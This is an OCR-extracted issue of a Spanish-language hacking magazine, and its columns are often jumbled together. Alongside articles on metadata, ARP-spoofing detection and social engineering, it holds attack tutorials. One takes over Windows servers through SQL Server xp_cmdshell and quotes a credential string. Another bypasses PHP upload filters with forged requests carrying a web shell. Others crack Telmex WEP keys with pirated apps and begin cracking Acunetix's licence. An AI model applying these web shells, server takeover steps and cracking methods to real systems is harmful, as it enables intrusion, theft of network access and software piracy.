Академический Документы
Профессиональный Документы
Культура Документы
ISSUE# 02
Editorial
Una vez mas estamos de el articulo asi es publicado, creemos en
vuelta con el segundo la libertad de expresión y es por eso
numero de la revista, que cada autor es responsable de lo que
la respuesta por parte escribe. A fin de cuentas es una revista
de ustedes los lectores de Hacking, no un diccionario Larousse.
fue increíble, el primer Yo por ejemplo tengo un teclado
tiraje se termino en americano donde no tiene acentos, y pues
su totalidad, hemos mis artículos saldrán obviamente sin
estado visitando una gran cantidad acentos a menos que el autocorrector
de Universidades en la republica agregue algunos por ahí.
Mexicana para promocionar la revista,
llevándoles charlas gratuitas con el Sigan al pendiente del twitter, del
staff de HackingMexico, y también Facebook, de la pagina, ya que ahí
organizando congresos y talleres de se van a enterar de donde estaremos
aprendizaje extremos, ya contamos con próximamente, para firmar revistas y
un staff mas amplio de conferencistas llevar talleres, gracias a toda la gente
reconocidos a nivel nacional e que coolaboro con artículos ya que
internacional con los cuales estaremos gracias a ellos se forma la revista, no
llevando los congresos a muchas olviden crear su blog gratuito en el
Universidades del país. portal, para poder compartir sus códigos
e investigaciones con todo el publico.
Una acalaracion que me gustaría hacer,
recibimos algunos comentarios en la Tambien apartir de este numero incluimos
edición anterior sobre las faltas de una sección donde podras ofrecer tus
ortografía que hay en la revista, esto servicios como consultor, diseñador,
se debe a que se decidio conservar la programador, etc sin costo alguno,
originalidad y escencia de cada autor, puedes enviar tu anuncio de 20 palabras
nosotros no editamos ni censuramos mas tu nombre e información de contacto
ningún contenido, tal y como nos envían al correo info@hackingmexico.mx
HackingMexico, Año 1, No. 2, enero – marzo 2013, es una publicación bimestral editada por Editorial Althair, www.indautor.sep.gob.mx, infoinda@sep.gob.mx. Editor responsable: Raul
Robles Aviles. ISSN: en tramite, otorgado por el Instituto Nacional del Derecho de Autor, Licitud de Título y contenido pendiente otorgado por la Comisión Calificadora de Publicaciones
y Revistas Ilustradas de la Secretaría de Gobernación. Permiso SEPOMEX No. 010203. Impresa por Alex Impresiones S. A. de C. V. Jose Revueltas 209 Del Benito Juarez, CP 03520 este
número se terminó de imprimir el 30 de Enero de 2013 con un tiraje de 7,000 ejemplares. Las opiniones expresadas por los autores no necesariamente reflejan la postura del editor de la
publicación. Queda estrictamente prohibida la reproducción total o parcial de los contenidos e imágenes de la publicación sin previa autorización del Instituto Nacional del Derecho de Autor.
No nos hacemos responsables por el mal uso de la informacion aqui expuesta, todo el material es con fines educativos y de investigacion, hackingmexico no incita a ningun tipo de vandalismo
virtual, cyberbullying, ni cyberamenzas. La informacion es para conocimiento de todos, para poder aprender como defenderse desde un punto de vista ofensivo.
Hackingmexico esta en contra de grupos de choque y activismo como “Anonymous”, nosotros somos un grupo de profesionales expertos en seguridad informatica que no apoyan este tipo
de actividades delictivas.
hax0rpedia
Hax0rpedia
Hambreado Pwner
Profesor x Aquel que pwnea
N00b Hash
Novato Funcion que convierte una cadena de
longitud variable a una cadena de
Lam0 longitud fija
Persona que quiere aparentar algo que
no es Md5
Un tipo de encriptacion de 32 bits
Lammer
Variacion de lam0 Bitcoins
Moneda descentralizada usada en la
Wargame deepweb
Pruebas de hacking en un ambiente
controlado Deepweb
Sitios underground que solo pueden
Pwn ser accesados via tor
Variacion del termino en ingles "own"
que significa apropiarse o ser dueño Tor
Red de anonimato
www.hackingmexico.mx 3
contenido
CONTENTS PAGE
Algo más allá
de lo visible 06
Hackeando
[Detección /protección] [de/ Correos
contra] ataques ARP-Poisoning mito o
(ARP-Spoofing) 08 realidad 34
Ingeniería social /
la mayor parte 12
Identity
Penetración de and Access
servidores windows 16 Management
Ayudando a la
organización 36
Bypassing
de Uploaders 20
CISCO/
JUNIPER 38
WarDriving 24
Nxt Controler
Un troyano
CRACKEANDO Para divertirse 42
ACUNETIX
V8–2012 28
4 www.hackingmexico.mx
P U B L Í C A T E C O N N O S O T R O S
informes 55 10 68 88 09
i n f o @ h a c k i n g m e x i c o . m x
algo más alla de lo visible
Algo m s á
de lo allá
visible POr
Froylan Sedeño
Documentos fotos y otros archivos contienen información oculta
sobre su origen información como: quien es el autor fecha de
@zolidk creación y modificación programas usados para su creación en
la fotografías tomadas por algunos móviles incluso contienen
coordenadas a esto se le llama metadatos pero…
6 www.hackingmexico.mx
algo más alla de lo visible
Archivo mp3 donde se muestran sus metadatos
Figura 2
¿Te robaron tu cámara fotográfica?
Existe una página en la red que ofrece un servicio que permite lo-
calizar tu cámara o por lo menos tratar, esto lo hace analizando los
metadatos de las fotográficas se sube una imagen que haya sido
tomada por tu cámara sin modificar y se analiza el archivo EXIF
el cual contiene el número de serie y otros datos únicos de la cáma-
ra, busca en su base de datos y tratara de encontrar si existe alguna
otra imagen en la red con los mismos datos si tu cámara fue robada
fue usada y subieron imágenes a la red seguramente aparecerá en
la plataforma aquí el link de la página por si quieres probar http://
www.stolencamerafinder.com/
metadatos como:
• OOMetaExtractor (Limpiar
documentos OpenOffice o LibreOffice (.odt)).
• JPEG y PNG Stripper (Limpiar
metadatos de imágenes de formato JPEG
y PNG).
• MetaShield Protector y Metadata
Extractor (Limpiar documentos ofimáticos:
MS Office de la versión 97 a la 2007 y
OpenOffice).
www.hackingmexico.mx 7
detección / protección
[Detección/p
POr
[de/co
ataq
Jesús Gómez (ZoSemU?)
zosemu@gmail.com
En este articulo me
permitiré explayarme con la
teoría porque creo que es
necesaria para comprender
a fondo que es lo que pasa
en este tipo de ataques, la
principal razón de hacerlo
ARP-Poi
así y no de otra manera es
que he visto que muchos que
dicen ser huaxors élite,
no tienen idea de cómo
funciona realmente esto y
luego dicen cosas que no
son ciertas. ( A R P - S p
8 www.hackingmexico.mx
protección]
detección / protección
ontra]
ques
isoning
o o f i n g )
contrario correríamos el riesgo de que nuestra informa- 2. Datos del paquete Ethernet
ción terminará en casa del vecino XD!!!-- en caso de no • Espacio de dirección de hardware --2 bytes (00 01)
encontrar dicha MAC en nuestra preciosa tabla se deberá • Espacio de dirección de protocolo --2 bytes (08 00)
realizar una consulta para averiguar cual es la dirección • Largo en bytes de cada dirección de hardware -- 1 byte (06)
MAC correspondiente a dicha IP, esto se conoce como • Largo en bytes de cada dirección de protocolo -- 1 byte (04)
ARP REQUEST, debido a la limitante de la capa en la • Opcode (REQUEST/REPLY) -- 2 bytes (00 01)
que opera, este tipo de consultas en realidad se realizan • Dirección de hardware del emisor del paquete -- 6 bytes
a la dirección del Broadcast (FF:FF:FF:FF:FF:FF) para (xx xx xx 71 cc e1)
cada IP a consultar, pero normalmente comienzan con la • Dirección del protocolo del emisor del paquete -- 4 bytes
IP de la que se desea averiguar la MAC, esto con el fin de (c0 a8 01 fe)
reducir la saturación de trafico; por otra parte el equipo al • Dirección del hardware del destinatario (*si se sabe) -- 6
que le estamos enviando el REQUEST recibe el paquete bytes (ff ff ff ff ff ff)
y debe actuar en consecuencia, lo que hace enviándonos • Dirección de protocolo del destinatario -- 4 bytes (c0 a8 01 02)
un paquete del tipo ARP REPLY. Para que ilustrar lo an-
terior, voy a mostrar a detalle con una captura de Wires- Los bytes que he señalado en gris corresponden a una can-
hark. (Figura 1) tidad variable de bytes. Por lo demás, la estructura será ne-
Es importante que podamos interpretar lo que significa cesariamente la misma para un ARP REPLY. Y como resulta
la información que tenemos para poder encontrar una forma evidente los bytes 21-22 son los que determinan de que tipo
de hacer que se comporte de otro modo, viendo al desnudo se trata 00 01 para un REQUEST y 00 02 para un REPLY.
nuestro ARP REQUEST podemos darnos una idea de como Ahora veamos que hace nuestro equipo para responder a
funciona entonces el ARP Poisoning. esa solicitud: (Figura 2)
En la estructura observamos que el paquete observamos Pongamos claridad en esto, como ya vimos el protocolo
que esta compuesto por: hace una consulta a su tabla local, en caso de tener la respuesta
resuelve y el paquete se envía, en caso de no existir se pregunta,
1. Capa de transmisión Ethernet si nadie responde se cancela el envío, si alguien responde se
• La dirección física de destino en este caso el broadcast --6 guarda la dirección en la tabla y se le manda el paquete.
bytes(ff ff ff ff ff ff) Ahora partiendo del hecho de que existen dos tipos de
• La dirección física de origen --6 bytes (xx xx xx 71 cc e1) entradas en la tabla local –dinámicas y estáticas--, surgen
• El tipo de protocolo --2 bytes (08 06) varias preguntas y posibilidades para el ataque, ¿qué pasaría
www.hackingmexico.mx 9
detección / protección
Figura 2
si nuestra víctima tuviera una entrada estática al router?, fin asignarle una IP valida y luego hacer el registro en todos y
del juego --porque aunque nosotros enviemos 1,000,000 de cada uno de los equipos que necesiten comunicarse con este
ARP REPLYs diciendo lo contrario, nuestra víctima los ig- nuevo equipo, bla bla bla.
norara por completo, porque ya no genera ARP REQUESTs Por lo tanto nuestra tarea como atacantes es hacerle pen-
(al menos no para esa IP) ohhhhhh!!. Entonces ya tenemos sar al router que nosotros somos nuestra víctima y a nuestra
la primer línea de defensa una entrada estática en nuestra víctima que nosotros somos el router, cómo lo conseguimos:
tabla ARP lo que conseguimos haciendo uso del comando:
10 www.hackingmexico.mx
y como no soy élite la programe en
detección / protección
VB 6, seguro que muchos élites la pu-
dieron haber programado en C o Del-
phi, pero…, no se les ocurrió antes y
en esto tengo merito jeje.
Todo surgió por un reto puesto que
si existía una herramienta que lo detec-
taba, pero siempre y cuando no te estu-
vieran atacando al momento de ejecu-
tarla, es decir que si alguien te ganaba la
carrera de lanzar el ataque antes de que
tu equipo cargará, estabas en las mis-
mas, bien como mencioné antes para
Figura 3
que el ataque funcione dependemos de
las tablas, como es bien sabido por to-
dos el sistema de los Ventanucos es muy
dado a pasarse por el forro todos los es-
tándares, así que en cuestión de ARP
no iba a ser la excepción y las tablas se
renuevan a un ritmo escandaloso mien-
tras estamos bajo un ataque, esto ocurre
porque al encontrarse una nueva entra-
da actualiza las demás, entonces si nos
están atacando el tiempo de vida de esas
tablas es menor, lo que juega un papel
importante para nuestro atacante, sin
embargo es aquí en donde vino la luz…
Si estamos bajo un ataque MITM
(Man In The Middle) como lo he expli-
cado, nuestro atacante deberá además
Figura 4
de engañarnos suplantando al router,
resolver todas nuestras conexiones, es
decir, se convierte en el router y así en el
inter, escucha nuestro tráfico ohhhhhh,
entonces la mejor manera de joderlo es
poner a prueba su capacidad de resol-
ver nuestras peticiones erróneas, tal y
como lo haría el router, ¿qué, porqué?,
sencillo si él no puede resolver, enton-
ces deberá pedir ayuda --¿a quién?-- al
router y es precisamente durante este
tiempo que tendrá que bajar la guardia y
mostrar su verdadera cara, es decir con-
seguiremos obtener dos IPs diferentes
en nuestra tabla ARP pero con la misma
MAC y así es como lo atrapamos, aún,
cuando ya estemos bajo su ataque. Para
eso solo tiramos un ping a un dominio
inexistente pero que pueda ser valido
por ejemplo “google.com.x”, “face-
book.con”, cualquiera sirve para atrapar
a nuestro pequeño mentiroso.
Bien ya solo me resta agregar un par
de capturas de pantalla en la primera se
muestra el cambio sufrido luego del ata-
que y en la segunda el resultado de nuestra
pequeña trampa jejeje. (Figura 3, 4)
www.hackingmexico.mx 11
ingeniería social
S
eguramente habrás consultado a alguien, o bien, una vulnerabilidad del sistema para hackear el servicio y ob-
alguien te ha consultado para conseguir una clave tener la clave (por ejemplo, la famosa creencia de hackear
de un correo, una cuenta de Facebook, de Mes- Hotmail). Para empezar, las claves van encriptadas en los
senger, y un largo etcétera. Lo más raro de todo, principales servicios y sólo pueden cambiarse, no pueden
es que casi siempre había que obtener una clave de alguien verse o saberse partiendo del hash.
que ni siquiera conoce la persona que se supone va a sacar En Hotmail, nos encontrábamos con la famosa “pregun-
la clave, y se asume que esa persona va a aprovecharse de ta secreta”, posteriormente agregaron preguntas más extra-
Ing
soc
ñas, como el código postal donde vives (a veces ni nosotros de los involucrados: los usuarios, los directivos y, sobre
lo sabemos), por lo que no podía ignorarse que la cuenta todo, de todos los trabajadores de la compañía. Casi siem-
pertenece a una persona de quien debe tenerse información. pre saben algo que es muy delicado respecto de alguien
Actualmente, la mayoría de las empresas, sin impor- o de la organización donde trabajan, si las personas están
tar su tamaño, aún no se toman muy en serio el asunto de felices no hay problema, pero si tienen un descontento y
que la seguridad informática es también responsabilidad son personas que no son muy respetuosas de la informa-
12 www.hackingmexico.mx
ingeniería social
ción, es posible que quieran sacar provecho del conoci- información privilegiada, es posible hacer dinero de esa forma,
miento que poseen. pero más allá de eso, nos referimos al valor de la información.
Es aquí donde hay alguien que sabe algo que nosotros quizá Como bien pudo ser información por adelantado, pudo
no, y es posible que nos interese saberlo. ¿Se imaginan conocer haber sido lo contrario, nos dicen que algo salió muy mal
por adelantado un gran hallazgo en una compañía, lo suficien- para que vendamos las acciones y dejemos de ganar dinero
temente importante como para saber que sus acciones subirán (o lo perdamos); así que esto puede ser un arma de doble
y que si compras ahora ganarías mucho dinero? Sin duda es filo, dependerá de la veracidad de la información.
geniería
cial parte
la mayor
POr Marco Antonio Camarena / Ingeniero en Computación, UNAM
@Chechesa / fb.me / Chechesa
Para hackear a una persona, generalmente es esa misma de las preguntas y pedir a alguien que las responda, muy proba-
persona la que debe darnos su información, ¿por qué ella mis- blemente no lo haga y se dé cuenta del truco.
ma? Porque podría ser información que nadie más conozca. Pongamos un ejemplo de ingeniería social: pasas un
Quizá el actor preferido, el nombre de la primer mascota o las chismógrafo (es una lista de preguntas que suele jugarse
placas del primer auto. Son cosas que no suelen salir en una contestando, para distraerse o despejarse, o simplemente
conversación y que si nos hacemos a la tarea de hacer una lista divertirte leyendo las respuestas de otros) con esas pre-
www.hackingmexico.mx 13
ingeniería social
guntas y adornas con la frase “Contesta las siguientes sación es de lo más normal del mundo, y mientras más
preguntas después de leer las respuestas de tu amigo, para temas hables, generalmente es más entretenida una con-
que te rías de las respuestas y tengas una sonrisa todo el versación. Sin duda obtendrás datos sensibles, que po-
día”, pasas el chismógrafo y contestan las preguntas que drían ser contraseñas o respuestas secretas potenciales.
necesitabas… Listo. ¿Cuál es tu comida favorita? Solía encontrar que muchos
Otro ejemplo en el que seas un habilidoso conversa- respondían “mole” o “chile”… Listo.
dor (con muy buena memoria, por cierto) y comiences a El espionaje industrial generalmente es llevado a
cambiar de temas rápidamente ¿te imaginas? Una conver- cabo por personas que actúan como ¡personas! No detrás
de un ordenador, sino a un lado de la persona con acceso ofrecerle a alguien “guardar una copia extra de la con-
a toda la información sensible de la organización. Los sis- traseña, por seguridad” y garantizar que está en buenas
temas computacionales rara vez fallan, los datos pueden manos… Listo.
ser encriptados y sólo la persona que tenga la clave po- Para conocer personas también funciona. Las chicas es-
dría ver esos datos, de modo que nadie más pueda saber tán más familiarizadas que los chicos con la ingeniería so-
qué contiene, y tratar de adivinar una (supongamos) muy cial; por ejemplo, si estás hablando con una chica, ella podrá
robusta contraseña no sería viable o recomendable, pero leer tu lenguaje corporal fácilmente. Las palabras podrían
14 www.hackingmexico.mx
ingeniería social
ser importantes, pero lo que dice tu cuerpo lo es más. Si prueba para su intelecto/área de conocimientos, puedes ha-
muestras ansiedad, tiemblas, tartamudeas o ríes nerviosa- cer la pregunta un poco más difícil.
mente, ellas lo verán de inmediato. En cambio, los chicos se Si eres chico y quieres acercarte a una chica, en lo que
fijan más en lo que dicen sus palabras, y a menudo no reci- menos debes pensar en lo que podría salir mal, sé diná-
birán el mensaje completo si no son buenos observadores (o mico y no te portes hiperactivo (eso asusta la mayoría de
si están nerviosos). las veces). Como depende más de cómo dices las cosas, si
Si eres chica y quieres acercarte a un chico, una bue- tu cuerpo habla adecuadamente, la conversación será más
na forma es preguntarle algo, si además quieres hacerle una fluida y divertida.
Un tip de convencimiento: el cerebro analiza primero Recuerda que la ingeniería social puede ser usada para
las opciones disponibles. Preguntar algo como “¿quieres el mal, pero también puede salvar vidas y evitar otras trage-
tomar un café?” tiene “Sí” y “No” como opciones, pero dias al ofrecerle confianza a quien te otorga la información
una pregunta como “¿cuál es tu refresco favorito?” o “¿te y respetar esa confianza, quizá aportando de forma benéfi-
gusta más el café o el refresco?” no tiene un no por res- ca, quizá simplemente guardando el secreto. Un gran poder
puesta, y estás provocando que a la otra persona se le conlleva una gran responsabilidad, y hay que saber respetar
antoje algo de beber… Listo. la privacidad de los demás y ser sincero.
www.hackingmexico.mx 15
penetración de servidores windows
Penetración
de
servidores
16
windows
www.hackingmexico.mx
penetración de servidores windows
H
ola soy Omar Ibañez (CorruptedByte), en esta ocacion mostrare una ma-
nera de penetrar servidores windows o mas bien como escalar privilegios
mediante SQL Server 2008. Muchas veces nos topamos con vulnerabili-
dades como “arbitrary file download”, “transversal directory”, “local file
inclusion”, “oracle padding attack” u otras y esto solo nos da acceso a codigo fuente o
archivos de configuración donde podemos encontrar el usuario y contraseña de SQL
Server (web.config) pero con esto muchas veces solo tenemos acceso a la base de datos
donde encontramos usuarios, contraseñas o muchas veces solo informacion inutil, pero
que tal si pudieramos tomar contro total del servidor con tan solo las credenciales de
SQL Server, esto es lo que mostrare en el transcurso de este articulo.
STORED PROCEDURES (PROCEDIMIENTOS desactivado por defecto debido a su alto riesgo, pero una
ALMACENADOS) vez que hayamos conseguido las credenciales de SQL Ser-
ver podemos activarlo, esta vez no me enfocare en sacar las
Como lo mencione anteriormente nos enfocaremos en la credenciales ya que como comente esto se puede obtener
penetracion de servidores windows mediante SQL Server y de el archivo web.config si es un servidor web programado
como sabemos Microsoft usa Transact-SQL (T-SQL) en su con .NET que es el archivo donde viene la configuracion y
motor de bases de datos, T-SQL como muchos otros motores la parte donde se encuentran las credenciales de SQL es el
de bases de datos tiene stored procedures que son programas ConnectionString y luce asi (esta es la parte de la conexión,
almacenados fisicamente en las bases de datos del motor, en el archivo es mas grande):
el caso de SQL Server de Microsoft las bases de datos del
motor son: master, model, msdb y tempdb.
<configuration>
XP_CMDSHELL <appSettings>
<add key=”ClearSaleActive” value=”true”/>
Uno de los stored procedures que tiene SQL Server es xp_ <addkey=”ConnectionString”value=”serv
cmdshell, xp_cmdshell nos proporciona una shell de coman- er=200.150.158.122; Database=lojavirus; User Id=virus;
dos directamente en el sistema con privilegios normalmente Password=3jig%o9!; Connection Timeout=20000”/>
administrativos asi que ya se podran imaginar que tanto po- </appSettings>
demos hacer con este stored procedure. </configuration>
www.hackingmexico.mx 17
penetración de servidores windows
TOMANDO EL CONTROL
TOTAL DEL SERVIDOR CON
XP_CMDSHELL
EXEC master.dbo.xp_cmdshell
‘comando a ejecutat’
Ejemplo:
EXEC master.dbo.xp_cmdshell
‘DIR C:\’ (Figura 1)
18 www.hackingmexico.mx
penetración de servidores windows
MSS EXPLOITER TOOL Con esto podemos acceder a una Con esto basicamente el servidor es
shell u a otras opciones, las 2 op- nuestro y podremos instalar un back-
Para instalar MSS Exploiter pueden ciones que mas nos facilitaran el door para tener una conexión persis-
bajarlo de http://corruptedbyte.org. trabajo es la de agregar un usuario tente o podemos hacer cualquier otra
mx/blog/mssexploiter ademas necesi- con permisos administrativos y la de cosa que se nos ocurra.
tan instalar unas librerias (esta escrito habilitar el escritorio remoto, para
en python y solo corre en linux). esto solo ejecutamos la 2da opcion Tomen en cuenta que muchas cosas
MSS Exploiter nos brinda 2 op- e introducimos el nuevo usuario y la podrian variar e incluso negarles el
ciones, conectarse al servidor win- nueva contraseña: acceso a activar el stored procedure ya
dows con las credenciales o en el caso que depende mucho de la configura-
de no tenerlas nos brinda la opcion de cion que le dan al servidor, pero la fun-
realizar un ataque de fuerza bruta. ciona con la configuracion tipica que
le dan casi todas las empresas, ami me
ha funcionado en muchos servidores y
es por eso que escribi MSS Exploiter
ya que me ahorra trabajo ala hora de
explotar servidores windows de esta
manera. Si el sitio de descarga no fun-
ciona para cuando esten leyendo esto o
necesitan ayuda con el script o explo-
Por ultimo ya solo nos quedaria ingre- tacion de servidores window con SQL
Si nos loguamos directamente con sar a el escritorio remoto ejecutando Server pueden mandarme un correo a:
las credenciales nos tira el siguiente la 5ta opcion: CorruptedByte@programmer.net.
menu donde introduciremos IP, usua-
rio y contraseña:
www.hackingmexico.mx 19
bypassing de uploaders
A
ntes que nada un saludo a toda la old school, en Ahi se especifica de que “tipo” es el archivo.
especial a mi buen amigo megabyte. En las siguientes lineas se dice cual es el contenido del
En este articulo les enseñare algunos archivo.Si querríamos subir un archivo .php al servidor
tecnicas (no todas) para bypassear algunos solamente tendríamos que mandar esta petición:
uploaders que usan metodos para filtrar los archivos que
son subidos. Código:
-----------------------------
1.- BYPASSEANDO UPLOADS 24464570528145\r\n
QUE USAN [‘TYPE’] Content-Disposition: form-
data; name=”archivo”;
Código: filename=”h4x0r1337.
<?php php”\r\n
$archivo = $HTTP_POST_FILES[‘archivo’]; Content-Type: image/
$tipo = $archivo[‘type’]; jpeg\r\n
if (!(strpos($tipo, “jpeg”))) { \r\n
echo’No aceptamos ese tipo de archivos’; <?php include($_
}else{ GET[‘c’]); ?>
if (move_uploaded_file($archivo[‘tmp_name’],
$archivo[‘name’])){ Si mandaramos
echo “Archivo subido correctamente <a href=’”.$arc esa petición al
hivo[‘name’].”’>Archivo</a>”; anterior upload
}else{ conseguiríamos
echo “No se puede sibir”; subir mishell.
} php con éxito,
} para modificar
?> las cabeceras que
manda tu navegador
El código vulnerable esta situado en: $archivo[‘type’]; Ya puedes instalar este
que type es extraído de los headers que envía el navegador complemento en tu
al subir un archivo, Por ejemplo este es el contenido de firefox:
post que envía mi firefox al subir una imagen a ese upload:
https://addons.mozilla.org/es-
Código: ES/firefox/addon/3829
-----------------------------24464570528145\r\n
Content-Disposition: form-data; name=”archivo”; Ese complemento capturara todas las
filename=”imagen.jpg”\r\n peticiones que envié tu navegador, solo
Content-Type: image/jpeg\r\n tienes que darle a repetir para editarlas o buscar un
\r\n software llamado «achilles» es muy viejo pero aun sirve..
BMV\x80\x0e
20 www.hackingmexico.mx
bypassing de uploaders
Primero con el live http headers capturamos la petición
if (!($ext != ‘jpg’)) {
que manda nuestro navegador al subir un archivo
echo’No aceptamos esa extension’;
llamado h4x0r1337.jpg:
}else{
if (move_uploaded_file($archivo[‘tmp_name’],
Código:
$archivo[‘name’])){
-----------------------------24464570528145\r\n
echo “Archivo subido correctamente <a href=’”.$arc
Content-Disposition: form-data; name=”archivo”;
hivo[‘name’].”’>Archivo</a>”;
filename=”h4x0r1337.jpg”\r\n
}else{
Content-Type: image/jpeg\r\n
echo “Imposible subir archivo”;
\r\n
}
<? include($_GET[s]); ?>
}
?>
Ahora le dariamos al boton que dice repetir y
Ese es un ejemplo muy simple, ahi
modificariamos la peticion asi
bastaría con subir un archivo con
nombre h4x0r1337.jpeg.php para
Código:
bypassear. Aquí pongo otro un
-----------------------------24464570528145\r\n
poco más complicado:
Content-Disposition: form-data; name=”archivo”;
filename=”h4x0r1337.php....”\r\n
Código:
Content-Type: image/jpeg\r\n
<?php
\r\n
$archivo =
<? include($_GET[s]); ?>
$HTTP_POST_
Así
FILES[‘archivo’];
$nombre =
$archivo[‘name’];
$exten =
lo
strrchr($nombre,
‘.’);
if ($ext ==
‘php’ or $ext ==
gra
‘php5’) {
echo’No
aceptamos ese tipo de
archivos’;
ria
}else{
if
(move_uploaded_
file($archivo[‘tmp_name’],
$archivo[‘name’])){
mos
echo “Archivo subido
correctamente a <a href=’”.$archivo
[‘name’].”’>Archivo</a>”;
}else{
echo “Imposible subir archivo”;
}
} bypassear
?>
el
Si subirieamos un archivo con el nombre h4x0r1337.jpg.
php no dejaria ya que usa $extension = strrchr($nombre,
‘.’); y ahí nos negaria la extension. Subir un archivo
uploader
llamado h4x0r1337 php.jpg tampoco nos valdría ya que Ojala sea de utilidad este pequeño tuto de como
.jpg no se ejecutaria en el servidor.La solución esta en subir Bypassear uploaders, Por motivos de trabajo me es
un archivo llamado h4x0r1337.php.... por ejemplo así muy dificil encontrar tiempo libre para colaborar, pero
bypasseariamos el filtro y mishell.php.... podría ser leído cuando me encuentro un espacio lo hago con mucho
como php en el servidor, veamos como hacerlo: gusto, saludos.
www.hackingmexico.mx 21
HackShop
Cursos Online
Diplomados
DVDs
Revistas
Hacking
Gadgets
Haciendo
WarDriving
Con IPhone, M4ku4Z^^
m4ku4z@m4ku4z.net
www.m4ku4z.net
Ipad, Ipod Touch
Obteniendo
S
aludos bandita una vez mas
es un placer estará aka con
ustedes , hoy veremos como Claves WEP
hacer ese tan afamado hackeo
de redes wifi y obtener las claves weps
mas rápido ke con
de los módems de Telmex en Mexico. Back Track de linux
Empezemos por definir que es
War Driving, según la Wikipedia: recomendable es el Bus_Wardriving, Hare un ejercicio con hackeando
Se llama wardriving a la búsqueda en la que aprovechando los trayectos una red pero analizando los siguientes
de redes inalámbricas Wi-Fi desde un de autobús urbano buscamos redes puntos de la infraestructura wifi:
vehículo en movimiento. Implica usar cómodamente reduciendo la emisión
un coche o camioneta y un ordenador de gases y los riesgos de conducir por • Provedoor de Servicio
equipado con Wi-Fi, como un portátil la ciudad. Esta modalidad plantea un • Fabricante y marca del modem
o una PDA, para detectar las redes. principal problema: la fuente de ali- • Direccion MAC
Esta actividad es parecida al uso de mentación está limitada a la propia • Tipo de Seguridad
un escáner para radio. batería del Portatil o PDA. • Implementada (WEP,
El wardriving recibe su nombre Hay Programas para nuestros ide- WPA,WPSK) etc.
del wardialing (popularizado en la pe- vices con los cuales podemos actual- • Canales de Acceso
lícula de Matthew Broderick Juegos mente obtener las contraseñas wep de
de guerra) porque también implica los módems y obtener acceso , expli- No falta el pendejo ke diga no mames
buscar sistemas informáticos. care brevemente el funcionamiento de , yo pa ke kiero saber eso ke pongan
Muchos practicantes usan dispo- cómo trabajan. como hacerlo , y siempre he dicho
sitivos GPS para determinar la ubica- Analizando varias apps ke he pro- algo si vas a hacer algo hazlo bien , no
ción de los hotspots hallados y regis- bado solo hay 7 ke ocupo en mi ipho- nadamas es hackear algo por hacerlo
trarla en un sitio web (el más popular ne y en mi ipad , las he probado y su , hay ke saber hacer bien las cosas .
es WiGLE). Para mejorar el rango nivel de porcentanje en el calculo de
de alcance, se construyen o compran las claves wep es de un 70% . *Las Aplicaciones estará disponibles
antenas, ya sean omnidireccionales o en la Repo de m4ku4z.net .
altamente direccionales. El software *Antes que nada Debes Hacer hecho
necesario se encuentra libremente en el jailbreak en tu idevice. (si la ban-
Internet, notablemente NetStumbler da pide un tuto para hacer el jailbreak
para Windows, KisMac para Ma- lo hare , a estas alturas debo asumir
cintosh y Kismet o SWScanner para que cualkiera de ustedes sabe ha-
GNU/Linux. cer jailbreak , ya que considero que
El uso masivo de PDA y smartpho- hay demasiados tutos en google ,
nes equipados con Wi-Fi facilitan pero si la banda lo rekiere pídanlo.
la práctica del wardriving, además
existen versiones especiales de Kis- *Este Procedimiento lo he hecho en
met y NetStumbler para la plataforma Mexico y funciona , no he probado en
Pocket PC, inclusive existe software otros países.
como WiFiFoFum que conectando un
GPS pueden crear una imagen de Ra-
dar de las redes circundantes.
Una variante muy interesante y
24 www.hackingmexico.mx
1. Primero Analizemos a ke viciti- 2. Veamos ke tipo de modem es y 3. Ahora Crackeando la clave wep
makuantosh
ma atakeremos: kien lo fabrica ^^ para “Infinitum9e8fb7” con iwep pro
*Como pueden ver la Victima SSID Como Podemos ver al hacer ahora el
es un Modem Infinitum de Telmex scaneo con las herramienta iwep pro
con 6 digitos. (siempre contar vemos incluso otra infinitum de 4 di-
lo dígitos depues de la palabra gitos pero por ahora nos concentrare-
“INFINITUMXXXXXX) mos en hackear la de 6 digitos.
Para esto la aplicación trabaja con
diccionarios ke intentan decifrar la
clave a base de fuerza bruta y poder
adivinar la correcta.
Tambien podemos apreciar ke la
aplicación nos ofrece una conccion
manual (por si ya tenemos la clave
pero nos da la opción de explotar la
vulnerabilidad del modem .
www.hackingmexico.mx 25
makuantosh
26 www.hackingmexico.mx
Reglas para usar esta otra
makuantosh
Aplicación llamada
Como podemos ver hemos obtenido la Y bajen las apps , son de paga pfffffffffffff,
clave , la cual es la segunda mostrada en pero en mi repo están crakeadas y son
la aplicación y listo. gratis ;) asi ke a disfrutar kuleros!!!!
¿Dónde consigo las aplicaciones con las ke Bueno amigos por mi parte ha sido todo
el m4ku4z hackeo la wifi de su vecino? sin antes agradecer su atención durante el
Facil y sencillo valedores , una vez ke tuto , espero le haya servido y utilizen al
tengan hecho el jailbreak agregen mi máximo su idevice y le saken el provecho
SOY
repo bajo la siguiente dirección: y recuerden:
http://repo.m4ku4z.net/cydia
“YO
EL M4KU4Z
Y USTEDES
NO …
www.hackingmexico.mx 27
crackeando acunetix
CRACKEANDO
ACUNET
Parte 1 de 3 / REVERSING / NIVEL: MEDIO-AVANZADO
Este tutorial es únicamente con fines educativos y no me hago
responsable por lo que se haga con su contenido.
Por Alejandro Torres (torrescrack)
e-mail: tora_248@hotmail.com
http://www.facebook.com/yo.torrescrack
www.torrescrack.blogspot.com
E
ste tutorial lo hice ya que no existe algún tute en la red nen solo una versión free que no escanea completamente como
de como atacar este software, y además de esto, resulta debería y la otra versión completa tiene un costo, en la red hay
que yo estaba buscando por la web algún escaneador un crack o parche pero no me anime a bajarlo, asi que me puse
de vulnerabilidades web reciente y bueno, leí en mu- a darle un vistazo para obtener mi propia versión liberada y
chos sitios que este software acunetix es uno de los mejores demostrar que este software especializado en buscar vulnerabi-
pero el problema es que yo quería probarlo y en la pagina tie- lidades web es muy vulnerable.
28 www.hackingmexico.mx
TIX
crackeando acunetix
V8–2012
EXPLORANDO AL ENEMIGO Uhmm vemos que antes de iniciar el soft me pide datos
Primero Instalamos y se me ocurrió correr el software para de la licencia para activar online y si no ingresas nada o algo
ver que tipo de protección o limitación utilizaba , veamos. erróneo no entras al soft , aparte de caro $$ ni siquiera te dejan
probar el software por unos días en su ver-
sión completa, vayamos a la carpeta donde
se instalo el software para ver que mas tiene.
www.hackingmexico.mx 29
crackeando acunetix
30 www.hackingmexico.mx
Que bien!!, si ven tenemos una
crackeando acunetix
dirección de memoria que dentro de
ella se encuentra un buffer y compa-
ra el contenido de esa direccion con 0
y si el valor es diferente ya no llama al
“activation.exe” supongo que al haber li-
